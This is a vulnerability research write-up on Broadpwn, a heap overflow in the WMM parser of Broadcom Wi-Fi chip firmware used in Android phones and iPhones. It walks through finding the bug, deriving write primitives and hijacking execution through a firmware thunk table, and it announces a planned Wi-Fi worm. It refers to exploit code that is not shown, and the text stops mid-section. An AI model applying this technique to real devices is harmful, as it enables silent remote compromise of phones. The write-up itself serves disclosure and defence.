Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets

Author: Nitay Artenstein

Introduction

Fully remote exploits that allow for compromise of a target without any user interaction have become something of a myth in recent years. While some are occasionally still found against insecure and unpatched targets such as routers, various IoT devices or old versions of Windows, practically no remotely exploitable bugs that reliably bypass DEP and ASLR have been found on Android and iOS. In order to compromise these devices, attackers normally resort to browser bugs. The downside of this approach, from an attacker’s perspective, is that successful exploitation requires the victim to either click on an untrusted link or connect to an attacker’s network and actively browse to a non-HTTPS site. Paranoid users will be wary of doing either of these things.

It is naive to assume that a well-funded attacker will accept these limitations. As modern operating systems become hardened, attackers are hard at work looking for new, powerful and inventive attack vectors. However, remote exploits are not a simple matter. Local attacks benefit from an extensive interaction with the targeted platform using interfaces such as syscalls or JavaScript, which allows the attacker to make assumptions about the target’s address space and memory state. Remote attackers, on the other hand, have a much more limited interaction with the target. In order for a remote attack to be successful, the bug on which it is based needs to allow the attacker to make as few assumptions as possible about the target’s state.

This research is an attempt to demonstrate what such an attack, and such a bug, will look like.
Broadpwn is a fully remote attack against Broadcom’s BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS. It is based on an unusually powerful 0-day, which we were able to leverage into a reliable, fully remote exploit.

In this post, we will describe our thought process in choosing an attack surface suitable for developing a fully remote exploit, explain how we homed in on particular code regions in order to look for a bug that can be triggered without user interaction, and walk through the stages of developing this bug into a reliable, fully remote exploit.

We will conclude with a bonus. During the early 2000s, self-propagating malware – or “worms” – was common. But the advent of DEP and ASLR largely killed off remote exploitation, and Conficker (2008) will be remembered as the last self-propagating network worm. We will revive this tradition by turning Broadpwn into the first WiFi worm for mobile devices, and the first public network worm in eight years.

THE ATTACK SURFACE

Two words make up an attacker’s worst nightmare when considering remote exploitation: DEP and ASLR. In order to leverage a bug into a full code execution primitive, some knowledge of the address space is needed. But with ASLR enabled, such knowledge is considerably more difficult to obtain, and sometimes requires a separate infoleak. And, generally speaking, infoleaks are harder to obtain on remote attack surfaces, since the target’s interaction with the attacker is limited. Over the past decade, hundreds of remote bugs have died miserable deaths due to DEP and ASLR.

Security researchers who work with embedded systems don’t have such troubles. Routers, cameras, and various IoT devices typically have no security mitigation enabled. Smartphones are different: Android and iOS have had ASLR enabled from a relatively early stage. But this description is misleading, since it refers only to code running on the main application processor. A smartphone is a complex system. Which other processors exist in a phone?

Most Android and iOS smartphones have two additional chips which are particularly interesting to us from a remote standpoint: the baseband and the WiFi chipset. The baseband is a fascinating and large attack surface, and it doubtlessly draws the attention of many attackers. However, attacking basebands is a difficult business, mainly due to fragmentation. The baseband market is currently going through a major shift: If, several years ago, Qualcomm were the unchallenged market leaders, today the market has split up into several competitors. Samsung’s Shannon modems are prevalent in most of the newer Samsungs; Intel’s Infineon chips have taken over from Qualcomm as the baseband for iPhone 7 and above; and MediaTek’s chips are a popular choice for lower cost Androids. And to top it off, Qualcomm is still dominant in higher end non-Samsung Androids.

WiFi chipsets are a different story: Here, Broadcom are still the dominant choice for most popular smartphones, including most Samsung Galaxy models, Nexus phones and iPhones. A peculiar detail makes the story even more interesting. On laptops and desktop computers, the WiFi chipset generally handles the PHY layer while the kernel driver is responsible for handling the MAC layer (layer 2) and above. This is known as a SoftMAC implementation. On mobile devices, however, power considerations often cause the device designers to opt for a FullMAC WiFi implementation, where the WiFi chip is responsible for handling the PHY, MAC and MLME on its own, and hands the kernel driver data packets that are ready to be sent up. Which means, of course, that the chip handles considerable attacker-controlled input on its own.

Another detail sealed our choice. Running some tests on Broadcom’s chips, we realised with joy that there was no ASLR and that the whole of RAM has RWX permissions – meaning that we can read, write and run code anywhere in memory. While the same holds partially true for Shannon and MediaTek basebands, Qualcomm basebands do support DEP and are therefore somewhat harder to exploit.

Before we continue, it should be mentioned that a considerable drawback exists when attacking the WiFi chip. The amount of code running on WiFi chipsets is considerably smaller than code running on basebands, and the 802.11 family of protocols is significantly less complicated to implement than the nightmarish range of protocols that basebands have to implement, including GSM and LTE. On a BCM4359 WiFi SoC, we identified approximately 9,000 functions. On a Shannon baseband, there are above 80,000. That means that a reasonably determined effort at code auditing on Broadcom’s part has a good chance of closing off many exploitable bugs, making an attacker’s life much harder. Samsung would need to put in considerably more effort to arrive at the same result.

THE BCM43XX FAMILY

Broadcom’s WiFi chips are the dominant choice for the WiFi slot in high-end smartphones. In a non-exhaustive survey, we’ve found that the following models use Broadcom WiFi chips:

  • Samsung Galaxy from S3 through S8, inclusive
  • All Samsung Notes
  • Nexus 5, 6, 6X and 6P
  • All iPhones after iPhone 5

The chip models range from BCM4339 for the oldest phones (notably Nexus 5) up to BCM4361 for the Samsung Galaxy S8. This research was carried out on both a Samsung Galaxy S5 (BCM4354) and a Samsung Galaxy S7 (BCM4359), with the main exploit development process taking place on the S7.

Reverse engineering and debugging the chip’s firmware is made relatively simple by the fact that the unencrypted firmware binary is loaded into the chip’s RAM by the main OS every time the chip is reset, so a simple search through the phone’s system will usually suffice to locate the Broadcom firmware. On Linux kernels, its path is usually defined in the config variable BCMDHD_FW_PATH.

Another blessing is that there is no integrity check on the firmware, so it’s quite easy to patch the original firmware, add hooks that print debugging output or otherwise modify its behaviour, and modify the kernel to load our firmware instead. A lot of this research was carried out by placing hooks at the right places and observing the system’s behaviour (and more interestingly, its misbehaviour).

All the BCM chips that we’ve observed run an ARM Cortex-R4 microcontroller. One of the system’s main quirks is that a large part of the code runs on the ROM, whose size is 900k. Patches, and additional functionality, are added to the RAM, also 900k in size. In order to facilitate patching, an extensive thunk table is used in RAM, and calls are made into that table at specific points during execution. Should a bug fix be issued, the thunk table could be changed to redirect to the newer code.

In terms of architecture, it would be correct to look at the BCM43xx as a WiFi SoC, since two different chips handle packet processing. While the main processor, the Cortex-R4, handles the MAC and MLME layers before handing the received packets to the Linux kernel, a separate chip, using a proprietary Broadcom processor architecture, handles the 802.11 PHY layer. Another component of the SoC is the interface to the application processor: Older BCM chips used the slower SDIO connection, while BCM4358 and above use PCIe.


The main ARM microcontroller in the WiFi SoC runs a mysterious proprietary RTOS known as HNDRTE. While HNDRTE is closed-source, there are several convenient places to obtain older versions of the source code. Previous researchers have mentioned the Linux brcmsmac driver, a driver for SoftMAC WiFi chips which handle only the PHY layer while letting the kernel do the rest. While this driver does contain source code which is also common to HNDRTE itself, we found that most of the driver code which handles packet processing (and that’s where we intended to find bugs) was significantly different from the code found in the firmware, and therefore did not help us with reversing the interesting code areas.

The most convenient resource we found was the source code for the VMG-1312, a forgotten router which also uses a Broadcom chipset. While the brcmsmac driver contains code which was open-sourced by Broadcom for use with Linux, the VMG-1312 contains proprietary Broadcom closed-source code, bearing the warning “This is UNPUBLISHED PROPRIETARY SOURCE CODE of Broadcom Corporation”. Apparently, the Broadcom code was published by mistake together with the rest of the VMG-1312 sources.

The leaked code contains most of the key functions we find in the firmware blob, but it appears to be dated, and does not contain much of the processing code for the newer 802.11 protocols. Yet it was extremely useful during the course of this research, since the main packet handling functions have not changed much. By comparing the source code with the firmware, we were able to get a quick high-level view of the packet processing code section, which enabled us to home in on interesting code areas and focus on the next stage: finding a suitable bug.

FINDING THE RIGHT BUG

By far, the biggest challenge in developing a fully remote attack is finding a suitable bug. In order to be useful, the right bug will need to meet all the following requirements:

  • It will be triggered without requiring interaction on behalf of the victim
  • It will not require us to make assumptions about the state of the system, since our ability to leak information is limited in a remote attack
  • After successful exploitation, the bug will not leave the system in an unstable state

Finding a bug that can be triggered without user interaction is a tall order. For example, CVE-2017-0561, which is a heap overflow in Broadcom’s TDLS implementation discovered by Project Zero, still requires the attacker and the victim to be on the same WPA2 network. This means the attackers either need to trick the victim into connecting to a WPA2 network that they control, or be able to connect to a legitimate WPA2 network which the victim is already on.

So where can we find a more suitable bug? To answer that question, let’s look briefly at the 802.11 association process. The process begins with the client, called mobile station (STA) in 802.11 lingo, sending out Probe Request packets to look for nearby Access Points (APs) to connect to. The Probe Requests contain data rates supported by the STA, as well as 802.11 capabilities such as 802.11n or 802.11ac. They will also normally contain a list of preferred SSIDs that the STA has previously connected to.

In the next phase, an AP that supports the advertised data rates will send a Probe Response containing data such as supported encryption types and 802.11 capabilities of the AP. After that, the STA and the AP will both send out Authentication Open Sequence packets, which are an obsolete leftover from the days WLAN networks were secured by WEP. In the last phase of the association process, a STA will send an Association Request to the AP it has chosen to connect to. This packet will include the chosen encryption type, as well as various other data about the STA.

All the packet types in the above association sequence have the same structure: A basic 802.11 header, followed by a series of 802.11 Information Elements (IEs). The IEs are encoded using the well known TLV (Type-Length-Value) convention, with the first byte of the IE denoting the type of information, the second byte holding its length, and the following bytes holding the actual data. By parsing this data, both the AP and the STA get information about the requirements and capabilities of their counterpart in the association sequence.
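The TLV layout described above can be illustrated with a minimal sketch of a bounds-checked IE walker. This is not Broadcom's parser: the names ie_view and find_ie are hypothetical, and the sketch only assumes the one-byte type and one-byte length encoding mentioned in the text.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One Information Element: 1-byte type, 1-byte length, then `len` data bytes. */
typedef struct {
    uint8_t id;
    uint8_t len;
    const uint8_t *data;
} ie_view;

/*
 * Find the first IE with the given id in buf[0..buf_len).
 * Returns 1 and fills *out on success; returns 0 if the IE is absent
 * or if an element claims more bytes than the buffer still holds.
 */
int find_ie(const uint8_t *buf, size_t buf_len, uint8_t id, ie_view *out)
{
    size_t off = 0;

    assert(buf != NULL && out != NULL);
    while (buf_len - off >= 2) {
        uint8_t cur_id = buf[off];
        uint8_t cur_len = buf[off + 1];

        /* Reject a length field that runs past the end of the frame. */
        if ((size_t)cur_len > buf_len - off - 2)
            return 0;
        if (cur_id == id) {
            out->id = cur_id;
            out->len = cur_len;
            out->data = buf + off + 2;
            return 1;
        }
        off += 2u + cur_len;
    }
    return 0;
}
```

Note that the walker only validates the length against the received frame. Whether the data fits into whatever destination buffer a later handler copies it to is a separate check, and that is the check that matters later in this post.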

Any actual authentication, implemented using protocols such as WPA2, happens only after this association sequence. Since there are no real elements of authentication within the association sequence, it’s possible to impersonate any AP using its MAC address and SSID. The STA will only be able to know that the AP is fake during the later authentication phase. This makes any bug during the association sequence especially valuable. An attacker who finds a bug in the association process will be able to sniff the victim’s probe requests over the air, impersonate an AP that the STA is looking for, then trigger the bug without going through any authentication.

When looking for the bug, we were assisted by the highly modular way in which Broadcom’s code handles the different protocols in the 802.11 family and the different functionalities of the firmware itself. The main relevant function in this case is wlc_attach_module, which abstracts each different protocol or functionality as a separate module. The names of the various initialization functions that wlc_attach_module calls are highly indicative. This is some sample code:

prot_g = wlc_prot_g_attach(wlc);
wlc->prot_g = prot_g;
if (!prot_g) {
  goto fail;
}
prot_n = wlc_prot_n_attach(wlc);
wlc->prot_n = prot_n;
if (!prot_n) {
  goto fail;
}
ccx = wlc_ccx_attach(wlc);
wlc->ccx = ccx;
if (!ccx) { 
  goto fail;
}
amsdu = wlc_amsdu_attach(wlc);
wlc->amsdu = amsdu;
if (!amsdu) {
  goto fail;
}

Each module initialization function then installs handlers which are called whenever a packet is received or generated. These callbacks are responsible for either parsing the contents of a received packet which are relevant for a specific protocol, or generating the protocol-relevant data for an outgoing packet. We’re mostly interested in the former, since this is the code which parses attacker-controlled data, so the relevant function here is wlc_iem_add_parse_fn, which has the following prototype:

 void wlc_iem_add_parse_fn(iem_info *iem, uint32 subtype_bitfield,
                           uint32 iem_type, callback_fn_t fn, void *arg)

The second and third arguments are particularly relevant here. subtype_bitfield is a bitfield containing the different packet subtypes (such as probe request, probe response, association request etc.) that the parser is relevant for. The third argument, iem_type, contains the IE type (covered earlier) that this parser is relevant for.

wlc_iem_add_parse_fn is called by the various module initialization functions in wlc_attach_module. By writing some code to parse the arguments passed to it, we can make a list of the parsers being called for each phase of the association sequence. By narrowing our search down to this list, we can avoid looking for bugs in areas of the code which don’t interest us: areas which occur only after the user has completed the full association and authentication process with an AP. Any bug that we might find in those areas will fail to meet our most important criterion – the ability to be triggered without user interaction.
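The filtering step can be sketched as follows. This is an illustration only: the subtype bit values, the parser_entry record and both helper functions are hypothetical, since the firmware's actual bit encoding is not given here. The idea is simply to record each (subtype_bitfield, iem_type) pair and then list the parsers whose bitfield includes a pre-authentication frame subtype.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical subtype bits; the real firmware encoding is an assumption. */
enum {
    ST_PROBE_REQ  = 1u << 0,
    ST_PROBE_RESP = 1u << 1,
    ST_ASSOC_REQ  = 1u << 2,
    ST_ASSOC_RESP = 1u << 3,
    ST_POST_AUTH  = 1u << 4   /* stands in for anything after association */
};

typedef struct {
    uint32_t subtype_bitfield;
    uint32_t iem_type;
    const char *name;
} parser_entry;

#define MAX_PARSERS 32
parser_entry registry[MAX_PARSERS];
size_t registry_len;

/* Record one registration, as recovered from a call to the add-parser routine. */
int record_parser(uint32_t subtype_bitfield, uint32_t iem_type, const char *name)
{
    assert(name != NULL);
    if (registry_len >= MAX_PARSERS)
        return -1;
    registry[registry_len].subtype_bitfield = subtype_bitfield;
    registry[registry_len].iem_type = iem_type;
    registry[registry_len].name = name;
    registry_len++;
    return 0;
}

/* Collect up to out_cap parsers that handle the given frame subtype bit. */
size_t parsers_for_subtype(uint32_t subtype_bit, const parser_entry **out,
                           size_t out_cap)
{
    size_t n = 0;

    for (size_t i = 0; i < registry_len && n < out_cap; i++) {
        if (registry[i].subtype_bitfield & subtype_bit)
            out[n++] = &registry[i];
    }
    return n;
}
```

Querying with the bits for probe and association frames yields the short list of parsers worth auditing, while anything registered only for later phases drops out.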

Using the approach above, we got lucky quite soon. In fact, it took us some time to realise just how lucky.

THE BUG

Wireless Multimedia Extensions (WMM) are a Quality-of-Service (QoS) extension to the 802.11 standard, enabling the Access Point to prioritize traffic according to different Access Categories (ACs), such as voice, video or best effort. WMM is used, for instance, to ensure optimal QoS for especially data-hungry applications such as VoIP or video streaming. During a client’s association process with an AP, the STA and AP both announce their WMM support level in an Information Element (IE) appended to the end of the Beacon, Probe Request, Probe Response, Association Request and Association Response packets.

In our search for bugs in functions that parse association packets after being installed by wlc_iem_add_parse_fn, we stumbled upon the following function:

void wlc_bss_parse_wme_ie(wlc_info *wlc, ie_parser_arg *arg) {
  unsigned int frame_type;  
  wlc_bsscfg *cfg;  
  bcm_tlv *ie;  
  unsigned char *current_wmm_ie;  
  int flags;
  frame_type = arg->frame_type;  
  cfg = arg->bsscfg;  
  ie = arg->ie;  
  current_wmm_ie = cfg->current_wmm_ie;  
  if ( frame_type == FC_REASSOC_REQ ) {
    ...
    <handle reassociation requests>
    ...
  }
  if ( frame_type == FC_ASSOC_RESP ) {    
    ...    
    if ( wlc->pub->_wme ) {      
      if ( !(flags & 2) ) {        
        ...        
        if ( ie ) {          
          ...          
          cfg->flags |= 0x100u;          
          memcpy(current_wmm_ie, ie->data, ie->len); // ie->len is not checked against the size of current_wmm_ie

 

In a classic bug, the program calls memcpy() in the last line without verifying that the buffer current_wmm_ie (our name) is large enough to hold the data of size ie->len. But it’s too early to call it a bug: let’s see where current_wmm_ie is allocated to figure out whether it really is possible to overflow. We can find the answer in the function which allocates the overflowed structure:

wlc_bsscfg *wlc_bsscfg_malloc(wlc_info *wlc) {  
  wlc_info *wlc;  
  wlc_bss_info *current_bss;  
  wlc_bss_info *target_bss;  
  wlc_pm_st *pm;  
  wmm_ie *current_wmm_ie;
  ...  
  current_bss = wlc_calloc(0x124);
  wlc->current_bss = current_bss;
  if ( !current_bss ) {
    goto fail;
  }
  target_bss = wlc_calloc(0x124);
  wlc->target_bss = target_bss;
  if ( !target_bss ) {
    goto fail;
  }
  pm = wlc_calloc(0x78);
  wlc->pm = pm;
  if ( !pm ) {
    goto fail;
  }
  current_wmm_ie = wlc_calloc(0x2C);
  wlc->current_wmm_ie = current_wmm_ie;
  if ( !current_wmm_ie ) {
    goto fail;
  }

As we can see in the last section, the current_wmm_ie buffer is allocated with a length of 0x2c (44) bytes, while the maximum size for an IE is 0xff (255) bytes. This means that we have a nice maximum overflow of 211 bytes.
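To make the arithmetic concrete, here is a minimal sketch of the length check that the vulnerable memcpy() lacks. It is not Broadcom's fix: copy_ie_checked and the two constants are hypothetical names, and the only values taken from the text are the 0x2c-byte allocation and the 0xff maximum IE length.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define WMM_IE_BUF_SIZE 0x2c   /* allocation size seen in wlc_bsscfg_malloc */
#define IE_MAX_LEN      0xff   /* largest value of the one-byte length field */

/* Worst-case number of bytes written past the end of the buffer. */
enum { MAX_OVERFLOW = IE_MAX_LEN - WMM_IE_BUF_SIZE };

/* Copy an IE body only if it fits; returns 0 on success, -1 if rejected. */
int copy_ie_checked(uint8_t dst[WMM_IE_BUF_SIZE], const uint8_t *data,
                    uint8_t len)
{
    assert(dst != NULL && data != NULL);
    if (len > WMM_IE_BUF_SIZE)
        return -1;              /* the check missing from the original code */
    memcpy(dst, data, len);
    return 0;
}
```

With this check in place, any IE longer than 44 bytes is rejected instead of spilling up to MAX_OVERFLOW (211) bytes into the neighbouring heap chunk.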

But an overflow would not necessarily get us very far. For example, CVE-2017-0561 (the TDLS bug) is hard to exploit because it only allows the attacker to overflow the size field of the next heap chunk, requiring complicated heap acrobatics in order to get a write primitive, all the while corrupting the state of the heap and making execution restoration more difficult. For all we knew at this point, our bug could land us in the same bad situation. So let’s understand what exactly is being overflowed here.

Given that the HNDRTE implementation of malloc() allocates chunks from the top of memory to the bottom, we can assume, by looking at the above code, that the wlc->pm struct will be allocated immediately following the wlc->current_wmm_ie struct which is the target of the overflow. To validate this assumption, let’s look at a hex dump of current_wmm_ie, which on the BCM4359 that we tested was always allocated at 0x1e7dfc:

00000000: 00 50 f2 02 01 01 00 00 03 a4 00 00 27 a4 00 00  .P..........'...
00000010: 42 43 5e 00 62 32 2f 00 00 00 00 00 00 00 00 00  BC^.b2/.........
00000020: c0 0b e0 05 0f 00 00 01 00 00 00 00 7a 00 00 00  ............z...
00000030: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000040: 64 7a 1e 00 00 00 00 00 b4 7a 1e 00 00 00 00 00  dz.......z......
00000050: 00 00 00 00 00 00 00 00 c8 00 00 00 c8 00 00 00  ................
00000060: 00 00 00 00 00 00 00 00 9c 81 1e 00 1c 81 1e 00  ................
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000a0: 00 00 00 00 00 00 00 00 2a 01 00 00 00 c0 ca 84  ........*.......
000000b0: ba b9 06 01 0d 62 72 6f 61 64 70 77 6e 5f 74 65  .....broadpwn_te
000000c0: 73 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00  st..............
000000d0: 00 00 00 00 00 00 fb ff 23 00 0f 00 00 00 01 10  ........#.......
000000e0: 01 00 00 00 0c 00 00 00 82 84 8b 0c 12 96 18 24  ...............$
000000f0: 30 48 60 6c 00 00 00 00 00 00 00 00 00 00 00 00  0H`l............

Looking at offset 0x2c, which is the end of current_wmm_ie, we can see the size of the next heap chunk, 0x7a – which is the exact size of the wlc->pm struct plus a two byte alignment. This validates our assumption, and means that our overflow always runs into wlc->pm, which is a struct of type wlc_pm_st.

It’s worthwhile to note that the position of both current_wmm_ie and pm is completely deterministic given a firmware version. Since these structures are allocated early in the initialization process, they will always be positioned at the same addresses. This fortunately spares us the need for complicated heap feng-shui – we always overflow into the same address and the same structure.

THE EXPLOIT

Finding a bug was the easy part. Writing a reliable remote exploit is the hard part, and this is usually where a bug is found to be either unexploitable or so difficult to exploit as to be impractical.

In our view, the main difficulty in writing a remote exploit is that some knowledge is needed about the address space of the attacked program. The other difficulty is that mistakes are often unforgivable: in a kernel remote exploit, for instance, any misstep will result in a kernel panic, immediately alerting the victim that something is wrong – especially if the crash is repeated several times.

In Broadpwn, both of these difficulties are mitigated by two main lucky facts: First, the addresses of all the relevant structures and data that we will use during the exploit are consistent for a given firmware build, meaning that we do not need any knowledge of dynamic addresses – after testing the exploit once on a given firmware build, it will be consistently reproducible. Second, crashing the chip is not particularly noisy. The main indication in the user interface is the disappearance of the WiFi icon, and a temporary disruption of connectivity as the chip resets.

This creates a situation where it’s possible to build a dictionary of addresses for a given firmware, then repeatedly launch the exploit until we have brute forced the correct set of addresses. A different, experimental solution, which does not require knowledge of any version-specific addresses, is given at the end of this section.

Let’s first look at how we achieve a write primitive. The overflowed structure is of type wlc_pm_st, and handles power management states, including entering and leaving power-saving mode. The struct is defined as follows:

typedef struct wlc_pm_st { 
  uint8 PM;
  bool PM_override;
  mbool PMenabledModuleId; 
  bool PMenabled; 
  bool PMawakebcn; 
  bool PMpending; 
  bool priorPMstate; 
  bool PSpoll; 
  bool check_for_unaligned_tbtt; 
  uint16 pspoll_prd; 
  struct wl_timer *pspoll_timer; 
  uint16 apsd_trigger_timeout; 
  struct wl_timer *apsd_trigger_timer; 
  bool apsd_sta_usp; 
  bool WME_PM_blocked; 
  uint16 pm2_rcv_percent; 
  pm2rd_state_t pm2_rcv_state; 
  uint16 pm2_rcv_time; 
  uint pm2_sleep_ret_time; 
  uint pm2_sleep_ret_time_left;  
  uint pm2_last_wake_time; 
  bool pm2_refresh_badiv; 
  bool adv_ps_poll; 
  bool send_pspoll_after_tx;    
  wlc_hwtimer_to_t *pm2_rcv_timer;  
  wlc_hwtimer_to_t *pm2_ret_timer; 
} wlc_pm_st_t;

Four members of this struct are especially interesting to control from an exploitation viewpoint: pspoll_timer and apsd_trigger_timer of type wl_timer, and pm2_rcv_timer and pm2_ret_timer of type wlc_hwtimer_to_t. First let’s look at the latter.

typedef struct _wlc_hwtimer_to {
  struct _wlc_hwtimer_to *next;
  uint timeout;
  hwtto_fn fun;
  void *arg;
  bool expired;
} wlc_hwtimer_to_t;

The function wlc_hwtimer_del_timeout is called after processing the packet and triggering the overflow, and receives pm2_ret_timer as an argument:

void wlc_hwtimer_del_timeout(wlc_hwtimer_to *newto) {  
  wlc_hwtimer_to *i;  
  wlc_hwtimer_to *next;   
  wlc_hwtimer_to *this;
  for ( i = &newto->gptimer->timer_list; ; i = i->next )  {    
    this = i->next;    
    if ( !i->next ) {
      break;
    }
    if ( this == newto ) {      
      next = newto->next;      
      if ( newto->next ) {        
        next->timeout += newto->timeout; // write-4 primitive   
      }      
      i->next = next;      
      this->fun = 0;      
      return;    
    }  
  }
}

As can be seen from the code, by overwriting the value of newto and causing it to point to an attacker controlled location, the contents of the memory location pointed to by next->timeout can be incremented by the memory contents of newto->timeout. This amounts to a write-what-where primitive, with the limitation that the original contents of the overwritten memory location must be known.
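The limitation mentioned above follows from the fact that the primitive adds rather than stores. A minimal userland model, with hypothetical names (node, unlink_accumulate, delta_for) and no relation to the firmware's real types, shows the arithmetic: to end up with a desired value, the attacker-supplied timeout must equal the desired value minus the original one, modulo 2^32.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified list node: only the two fields the unlink arithmetic touches. */
typedef struct node {
    struct node *next;
    uint32_t timeout;
} node;

/* The same arithmetic the unlink performs: next->timeout += removed->timeout. */
void unlink_accumulate(node *removed)
{
    assert(removed != NULL);
    if (removed->next)
        removed->next->timeout += removed->timeout;
}

/* Increment needed so that (original + delta) wraps around to `desired`. */
uint32_t delta_for(uint32_t original, uint32_t desired)
{
    return desired - original;   /* unsigned arithmetic wraps modulo 2^32 */
}
```

If the original contents are not known, the increment cannot be computed, which is why this primitive is less convenient than a plain store.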

A less limited write primitive can be achieved by using the pspoll_timer member, of type struct wl_timer. This struct is handled by a callback function triggered regularly during the association process:

int timer_func(struct wl_timer *t) {  
  prev_cpsr = j_disable_irqs();  
  v3 = t->field_20;    
  ...
  if ( v3 ) {    
    v7 = t->field_18;    
    v8 = &t->field_8;    
    if ( &t->field_8 == v7 ) {
      ... 
    } else {      
      v9 = t->field_1c;      
      v7->field_14 = v9;      
      *(v9 + 16) = v7;      
      if ( *v3 == v8 ) {        
        v7->field_18 = v3; 
      }    
    }    
    t->field_20 = 0;  
  }  
  j_restore_cpsr(prev_cpsr);  
  return 0;
}

As can be seen towards the end of the function, we have a much more convenient write primitive here. Effectively, we can write the value we store in field_1c to the address we store in field_18, offset by 0x14 (the store goes to v7->field_14). With this, we can write an arbitrary value into any memory address, without the limitations of the previous write primitive we found.

The next question is how to leverage our write primitive into full code execution. For this, two approaches will be considered: one which requires us to know firmware memory addresses in advance (or to brute force those addresses by crashing the chip several times), and another method, more difficult to implement, which requires a minimum of that knowledge. We’ll look at the former approach first.

To achieve a write primitive, we need to overwrite pspoll_timer with a memory address that we control. Since the addresses of both wlc->current_wmm_ie and wlc->pm are known and consistent for a given firmware build, and since we can fully overwrite their contents, we can clobber pspoll_timer to point anywhere within these objects. For the creation of a fake wl_timer object, the unused area between wlc->current_wmm_ie and wlc->pm is an ideal fit. Placing our fake timer object there, we’ll cause field_18 to point to an address we want to overwrite (minus an offset of 0x14) and have field_1c hold the contents we want to overwrite that memory with. After we trigger the overflow, we only need to wait for the timer function to be called and do our overwrite for us.
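The relationship between field_18, field_1c and the written address can be modelled in a few lines. This is a simulation over a plain byte array, not firmware code: mem, store32, load32, fake_timer and make_fake_timer are all hypothetical, and the model deliberately ignores the second store in timer_func, *(v9 + 16) = v7.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MEM_SIZE 0x100
uint8_t mem[MEM_SIZE];                 /* stand-in for chip RAM */

void store32(uint32_t addr, uint32_t value)
{
    assert(addr <= MEM_SIZE - 4);
    memcpy(&mem[addr], &value, 4);
}

uint32_t load32(uint32_t addr)
{
    uint32_t value;

    assert(addr <= MEM_SIZE - 4);
    memcpy(&value, &mem[addr], 4);
    return value;
}

/* Only the two fields of the timer object that drive the store. */
typedef struct {
    uint32_t field_18;   /* treated as a pointer by the callback */
    uint32_t field_1c;   /* value that gets stored */
} fake_timer;

/* Mirrors `v7->field_14 = v9` with v7 = t->field_18 and v9 = t->field_1c. */
void timer_store(const fake_timer *t)
{
    store32(t->field_18 + 0x14, t->field_1c);
}

/* Build a fake timer so that the store lands exactly on `target`. */
fake_timer make_fake_timer(uint32_t target, uint32_t value)
{
    fake_timer t = { target - 0x14, value };
    return t;
}
```

The subtraction in make_fake_timer corresponds to the p_patch - 0x14 adjustment that appears in the exploit buffer code further down.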

The next stage is to determine which memory address we want to overwrite. As can be seen in the above function, immediately after we trigger our overwrite, a call to j_restore_cpsr is made. This function basically does one thing: it refers to the function thunk table found in RAM (mentioned previously when we described HNDRTE and the BCM43xx architecture), pulls the address of restore_cpsr from the thunk table, and jumps to it. Therefore, by overwriting the entry for restore_cpsr in the thunk table, we can cause our own function to be called immediately afterwards. This has the advantage of being portable, since both the starting address of the thunk table and the index of the pointer to restore_cpsr within it are consistent between firmware builds.
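The indirection that makes this possible is the same one that makes ROM patching possible. A minimal sketch, with entirely hypothetical names (thunk_table, call_restore, patch_thunk) and an ordinary C function-pointer table standing in for the firmware's thunk table, shows why a single pointer-sized write changes what every caller executes.

```c
#include <assert.h>

typedef int (*thunk_fn)(int);

/* Two stand-in routines: the shipped one and a replacement. */
int original_restore(int x) { return x; }
int replacement(int x)      { return x + 1000; }

enum { IDX_RESTORE = 0, THUNK_COUNT = 1 };

/* Writable table of entry points, consulted on every call. */
thunk_fn thunk_table[THUNK_COUNT] = { original_restore };

/* Callers never reference the routine directly; they go through the table. */
int call_restore(int x)
{
    assert(thunk_table[IDX_RESTORE] != 0);
    return thunk_table[IDX_RESTORE](x);
}

/* A vendor patch and an attacker's write both amount to this assignment. */
void patch_thunk(int idx, thunk_fn fn)
{
    assert(idx >= 0 && idx < THUNK_COUNT && fn != 0);
    thunk_table[idx] = fn;
}
```

Because the table lives in writable memory and nothing validates its entries, whoever controls one entry controls the next call made through it.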

We have now obtained control of the instruction pointer and have a fully controlled jump to an arbitrary memory address. This is made sweeter by the fact that there are no restrictions on memory permissions – the entire RAM is RWX, meaning we can execute code from the heap, the stack or wherever else we choose. But we still face a problem: finding a good location to place our shellcode. We can write the shellcode to the wlc->pm struct that we are overflowing, but this poses two difficulties: first, our space is limited by the fact that we only have an overwrite of 211 bytes. Second, the wlc->pm struct is constantly in use by other parts of the HNDRTE code, so placing our shellcode at the wrong place within the structure will cause the whole system to crash.

After some trial and error, we realized that we had a tiny amount of space for our code: 12 bytes within the wlc->pm struct (the only place where overwriting data in the struct would not crash the system), and 32 bytes in an adjacent struct which held an SSID string (which we could freely overwrite). 44 bytes of code are not a particularly useful payload – we’ll need to find somewhere else to store our main payload.

The normal way to solve such a problem in exploits is to look for a spray primitive: we’ll need a way to write the contents of large chunks of memory, giving us a convenient and predictable location to store our payload.

While spray primitives can be an issue in remote exploits, since sometimes the remote code doesn’t give us a sufficient interface to write large chunks of memory, in this case it was easier than expected – in fact, we didn’t even need to go through the code to look for suitable allocation primitives. We just had to use common sense.

Any WiFi implementation will need to handle many packets at any given time. For this, HNDRTE provides the implementation of a ring buffer common to the D11 chip and the main microcontroller. Packets arriving over PHY are repeatedly written to this buffer until it gets filled, at which point new packets are simply written to the beginning of the buffer and overwrite any existing data there.
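The wrap-around behaviour can be shown with a generic ring buffer. This is a textbook sketch and not HNDRTE's implementation: the ring type, the 16-byte size and ring_write are all assumptions chosen for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RING_SIZE 16

typedef struct {
    uint8_t data[RING_SIZE];
    size_t head;              /* next write position */
} ring;

/* Append len bytes, wrapping to the start once the end is reached. */
void ring_write(ring *r, const uint8_t *src, size_t len)
{
    assert(r != NULL && src != NULL);
    for (size_t i = 0; i < len; i++) {
        r->data[r->head] = src[i];
        r->head = (r->head + 1) % RING_SIZE;   /* old data is overwritten */
    }
}
```

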